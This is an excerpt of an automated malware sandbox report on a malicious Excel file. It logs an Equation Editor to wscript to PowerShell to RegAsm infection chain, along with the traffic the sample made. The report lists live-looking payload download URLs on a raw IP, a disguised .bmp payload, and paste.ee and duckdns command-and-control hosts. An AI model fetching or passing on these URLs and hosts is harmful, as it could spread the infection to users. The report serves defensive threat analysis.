            Source: global trafficHTTP traffic detected: GET /nLNG HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: z2.inkConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /100500/vff/lioniskingandtigerisalsotryingforkingbutdifferentistheattitudeofthistwoanimalaredifferentlionsisalwaysalionitsucantcomparewith__anyotherbecauselionbeauties.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.154Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /100500/lionsandtigerbeautifulpicture.bmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.46.178.154Connection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,17_2_0041B380
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\940091CF.emf
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: z2.ink
            Source: global trafficDNS traffic detected: DNS query: paste.ee
            Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
            Source: global trafficDNS traffic detected: DNS query: sembe.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 07:00:28 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 
4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 07:00:29 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 0a 6c 61 6e 67 3d 65 6e 2d 55 53 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 3c 68 65 61 64 3e 3c 73 74 79 6c 65 3e 69 6d 67 2e 6c 61 7a 79 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 6c 6f 61 64 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 64 33 62 74 72 68 65 79 65 6a 6d 69 76 79 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 65 64 67 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 33 2d 74 6f 74 61 6c 2d 63 61 63 68 65 2f 70 75 62 2f 6a 73 2f 6c 61 7a 79 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 20 61 73 3d 73 63 72 69 70 74 3e 3c 6d 65 74 61 0a 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 0a 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 69 6e 67 62 61 63 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 61 63 65 2e 6c 69 6e 6b 73 67 70 74 2e 63 6f 6d 2f 65 64 67 65 2f 78 6d 6c 72 70 63 2e 70 68 70 3e 20 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4e 61 6d 65 20 3d 20 27 6a 73 27 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 6c 69 6e 6b 0a 72 65 6c 3d 70 72 65 63 6f 6e 6e 65 63 74 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 73 74 79 6c 65 20 69 64 3d 65 74 2d 64 69 76 69 2d 6f 70 65 6e 2d 73 61 6e 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 2f 2a 20 
4f 72 69 67 69 6e 61 6c 3a 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 26 23 30 33 38 3b 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 6c 61 74 69 6e 2d 65 78 74 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 20 2a 2f 2f 2a 20 55 73 65 72 20 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 55 6e 6b 6e 6f 77 6e 3b 20 4c 69 6e 75 78 20 78 38 36 5f 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 38 2e 31 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 53 61 66 61 72 69 2f 35 33 38 2e 31 20 44 61 75 6d 2f 34 2e 31 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 07:00:30 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-alive
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Edge: smart-1.high-performance.networkDate: Mon, 27 May 2024 07:00:36 GMTContent-Length: 102317Server: LINKSGPTCache-Control: no-store, no-cache, must-revalidateConnection: keep-alive
            Source: EQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmp
            Source: EQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpj
            Source: EQNEDT32.EXE, 00000007.00000002.425990607.000000000061F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.154/100500/lionsandtigerbeautifulpicture.bmpw
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.1078551055.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.1078551055.0000000000895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: powershell.exe, 0000000C.00000002.466787853.0000000004477000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: powershell.exe, 0000000A.00000002.549227483.00000000027D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.466787853.0000000002771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.465713352.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: wscript.exe, 00000009.00000003.432521109.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431629042.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431571140.0000000003AD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431892049.0000000003AD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.436432327.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431591415.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.477785176.0000000005030000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: z2.ink.url.4.drString found in binary or memory: http://z2.ink/
            Source: Ref19920830281982938RT.xls, nLNG.url.4.drString found in binary or memory: http://z2.ink/nLNG
            Source: FE430000.0.dr, ~DF413A5A3890D32AE4.TMP.0.drString found in binary or memory: http://z2.ink/nLNGyX
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: wscript.exe, 00000009.00000003.431940170.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431970404.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.433992431.000000000079A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.431827511.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 0000000C.00000002.466787853.0000000003799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
